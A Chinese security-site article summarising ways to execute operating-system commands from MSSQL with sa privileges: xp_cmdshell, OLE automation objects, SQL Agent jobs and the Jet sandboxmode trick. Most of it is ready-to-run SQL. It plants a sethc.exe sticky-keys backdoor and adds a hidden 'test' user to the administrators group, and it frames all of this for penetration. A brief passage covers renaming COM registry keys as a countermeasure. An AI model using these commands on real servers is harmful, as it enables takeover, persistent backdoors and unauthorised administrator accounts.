当前位置：移动技术网 > 网络运营>安全>企业安全 > mssql的sa权限执行命令方法总结

mssql的sa权限执行命令方法总结

2019年05月25日 | 移动技术网网络运营 | 我要评论

　测试环境：windows xp pro sp2 + mssql 2005（服务以system权限启动）
　　一．xp_cmdshell
　　exec master..xp_cmdshell ‘ipconfig’
　　开启xp_cmdshell:
　　– to allow advanced options to be changed.
　　exec sp_configure ’show advanced options’, 1
　　go
　　– to update the currently configured value for advanced options.
　　reconfigure
　　go
　　– to enable the feature.
　　exec sp_configure ‘xp_cmdshell’, 1
　　go
　　– to update the currently configured value for this feature.
　　reconfigure
　　go
　　二．sp_oacreate
　　创建wscript.shell对象
　　use master declare @o int exec sp_oacreate ‘wscript.shell’,@o out exec sp_oamethod @o,‘run’,null,‘cmd /c "net user" > c:\test.tmp’
　　创建scripting.filesystemobject对象
　　declare @o int
　　exec sp_oacreate ’scripting.filesystemobject’, @o out
　　exec sp_oamethod @o, ‘copyfile’,null,‘c:\windows\explorer.exe’ ,‘c:\windows\system32\sethc.exe’;
　　declare @oo int
　　exec sp_oacreate ’scripting.filesystemobject’, @oo out exec sp_oamethod @oo, ‘copyfile’,null,‘c:\windows\system32\sethc.exe’ ,‘c:\windows\system32\dllcache\sethc.exe’;
　　可以用utilman.exe代替sethc.exe达到同样的效果后门很酷吗，呵呵
　　创建shell.application对象
　　declare @o int
　　exec sp_oacreate ‘shell.application’, @o out
　　exec sp_oamethod @o, ‘shellexecute’,null, ‘cmd.exe’,‘cmd /c net user >c:\test.txt’,‘c:\windows\system32′,”,1;
　　开启ole automation procedures
　　sp_configure ’show advanced options’, 1;
　　go
　　reconfigure;
　　go
　　sp_configure ‘ole automation procedures’, 1;
　　go
　　reconfigure;
　　go
　　我们的对策就是把对象做一下手脚
　　wscript.shell可以调用系统内核运行dos基本命令
　　可以通过修改注册表，将此组件改名，来防止危害。
　　hkey_classes_root\wscript.shell\
　　及hkey_classes_root\wscript.shell.1\
　　改名为其它的名字，如：改为wscript.shell_changename或wscript.shell.1_changename
　　自己以后调用的时候使用这个就可以正常调用此组件了
　　也要将clsid值也改一下
　　hkey_classes_root\wscript.shell\clsid\项目的值
　　hkey_classes_root\wscript.shell.1\clsid\项目的值
　　同wscript.shell理、scripting.filesystemobject、shell.application
　　三．job
　　利用job执行命令，有一个先决条件就是开启sqlserveragent服务，下面的语句可以开启
　　exec master.dbo.xp_servicecontrol ’start’,'sqlserveragent’
　　use msdb create table [jncsql](resulttxt nvarchar(1024) null) exec sp_delete_job null,‘x’ exec sp_add_job ‘x’ exec
　　sp_add_jobstep null,‘x’,null,‘1′,‘cmdexec’,‘cmd /c "net user>c:\test.test"’ exec sp_add_jobserver
　　null,‘x’,@@servername exec sp_start_job ‘x’;
　　四．sandboxmode（网上常说的沙盒模式）
　　原理：在access里调用vbs的shell函数，以system权限执行任何命令。但是试用这个函数之前必须把注册表里的一个叫sandboxmode的开关打开，
　　注册表：hkey_local_machine\software\micris
　　oft\jet\4.0\engine\sandboxmode.默认值为2，这个人键值为0表示始
　　终禁用sandboxmode模式，1表示对于非acess应用程序试用sandboxmode模式，2表示对access应用程序使用sandboxmode模式，3则表示完全开启安全设置。//1或0都可以执行命令
　　exec sp_addlinkedserver ‘testsql’,'ole db provider for jet’,'microsoft.jet.oledb.4.0′,’c:\windows\system32\ias\ias.mdb’
　　exec master..xp_regwrite ‘hkey_local_machine’,‘software\microsoft\jet\4.0\engines’,‘sandboxmode’,‘reg_dword’,1
　　exec master..xp_regread hkey_local_machine ,‘software\microsoft\jet\4.0\engines’,‘sandboxmode’
　　select * from openrowset(‘microsoft
　　.jet.oledb.4.0′,‘;database=c:\windows\system32\ias\ias.mdb’,’select shell("cmd.exe /c net user test test /add")’)
　　select * from openrowset(‘microsoft.jet.oledb.4.0′,
　　‘;database=c:\windows\system32\ias\ias.mdb’,’select shell("cmd.exe /c net localgroup administrators test /add")’)
　　下面是系统自带的两个mdb文件
　　c:\windows\system32\ias\dnary.mdb
　　c:\windows\system32\ias\ias.mdb
　　总结
　　上述几种方法（仔细看看我都忘记有几种了，哈哈。你可以发散思维，再找出来几种）都是在默认情况下测试的，往往渗透的时候有很多限制条件，我们可以逐一克服，利用组件得到服务器信息，读取、创建文件了等等，我们还是要对权限这个词组有深层次的理解啊。
　　附注
　　关于*.exe c:\windows\system32\ 还有c:\windows\system32\dllcache呢
　　关于cmd.exe还有command.exe呢
　　关于net.exe还有net1.exe呢
　　mdb文件不存在我们可以上传一个啊
　　执行命令的组件不是只有一个哦

您可能感兴趣的文章:

如对本文有疑问，点击进行留言回复！！

麦咖啡 (mcafee) VSE 8.5 防止Serv-U提权

Serv-U现在很多服务器上都用着.所以对他的攻击也太多了.最经典的莫过于Serv-U提权 ... 09-07-20 [阅读全文]
麦咖啡(mcafee) VSE 8.5 服务器防挂马心得

正好今天在查看服务器日志的时候.发现McAfee又一次成功的拦截了挂马,特给大家分享下。 ... 09-07-20 [阅读全文]
麦咖啡(mcafee)用8.5I做的防挂马心得

家好，我是新手，我的站这几天经常被挂马，每次都很麻烦，特郁闷，也不知道是那里出的问题，只要借用mcafee了，首先我们进入控制台... 09-07-20 [阅读全文]
mcafee 企业版8.0 i设置指南(图文)

这里要说的就是是否扫描压缩文件，我的建议是不扫描，因为扫描他们会花去大量的时间，即时里面有病毒，也需要先解压出来，就是直接运行也要解压到临时文件夹，这个时候麦咖... [阅读全文]
mcafee 打造安全的windows服务器安全设置图文说明

为了让服务器更安全，不如提取，后门等程序的运行，下面的设置对于服务器来说是非常必要，这里是一些引导设置，更多的大家可以自行发挥。... 10-05-12 [阅读全文]
利用麦咖啡(McAfee)对服务器Web站点进行有效安全设置与管理

本文主要拿ASP文件做演示,大家可以修改E:\wwwroot**.asp为我们所希望限制的文件格式... 10-09-23 [阅读全文]
mcafee 新手入门教程之如何输入密码解除锁定

这篇文章主要是针对脚本之家服务器安全设置的用户准备的。我们配置以后会给客户一个详细的说明，方法大家使用，不懂的可以联系我们。包教会。... 11-03-20 [阅读全文]
win系统自带不起眼但又很强的杀毒工具

Windows系统集成了无数的工具，它们各司其职，满足用户不同的应用需求。其实这些工具“多才多艺”，如果你有足够的想象力并且善于挖掘，你会发现它们除了本行之外还... [阅读全文]
Mcafee8.5i 安装使用设置详解[图文]

Mcafee的精髓就在于规则设置。只要访问保护规则设置得好，几乎可以说是能够做倒百毒不侵。但它却是所有杀软中设置最为复杂，软件界面也不太符合我们的使用习惯的软件... [阅读全文]
微软有史以来最严重漏洞的弥补

6月10日凌晨微软发布了有史以来严重漏洞补丁升级公告！我们先看看严重会对用户直接造成经济损失的漏洞情况：严重-MS09-022：Windows 打印后台处理... [阅读全文]

网友评论


验证码：

mssql的sa权限执行命令方法总结

2019年05月25日 | 移动技术网网络运营 | 我要评论

您可能感兴趣的文章:

相关文章:

网友评论